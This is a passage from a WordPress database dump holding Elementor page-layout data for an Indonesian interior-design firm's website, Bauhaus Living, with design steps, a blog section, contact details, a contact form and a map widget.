unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\" Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living\",\"title\":\"Wujudkan mimpi anda sekarang!\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8611b14\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(4572,4977,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4573,4977,'_elementor_pro_version','3.8.1'),(4574,4977,'_elementor_css','a:6:{s:4:\"time\";i:1695638544;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4575,22,'_elementor_css','a:6:{s:4:\"time\";i:1695734078;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4576,4979,'_wp_page_template','elementor_header_footer'),(4577,4979,'_elementor_edit_mode','builder'),(4578,4979,'_elementor_template_type','wp-page'),(4579,4979,'_elementor_version','3.8.1'),(4580,4979,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"021 22544768\",\"phone_address\":\"+021 22544768\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Saatnya Impian Anda Menjadi Kenyataan!\",\"description\":\"Jangan kompromi dengan kualitas hidup Anda. Percayakan Bauhaus Living untuk mengubah ruang Anda menjadi tempat yang nyaman, fungsional, dan penuh gaya. Hubungi kami hari ini temukan clarity kebutuhan kenyamanan Anda dan mulailah perjalanan menuju interior yang menginspirasi!\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(4581,4979,'_elementor_page_assets','a:0:{}'),(4582,4979,'_elementor_pro_version','3.8.1'),(4583,4979,'_elementor_css','a:6:{s:4:\"time\";i:1695718921;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:7:\"ovaicon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4584,4980,'_wp_page_template','elementor_header_footer'),(4585,4980,'_elementor_edit_mode','builder'),(4586,4980,'_elementor_template_type','wp-page'),(4587,4980,'_elementor_version','3.8.1'),(4588,4980,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"021 22544768\",\"phone_address\":\"+021 22544768\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Saatnya Impian Anda Menjadi Kenyataan!\",\"description\":\"Jangan kompromi dengan kualitas hidup Anda. Percayakan Bauhaus Living untuk mengubah ruang Anda menjadi tempat yang nyaman, fungsional, dan penuh gaya. Hubungi kami hari ini temukan clarity kebutuhan kenyamanan Anda dan mulailah perjalanan menuju interior yang menginspirasi!\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 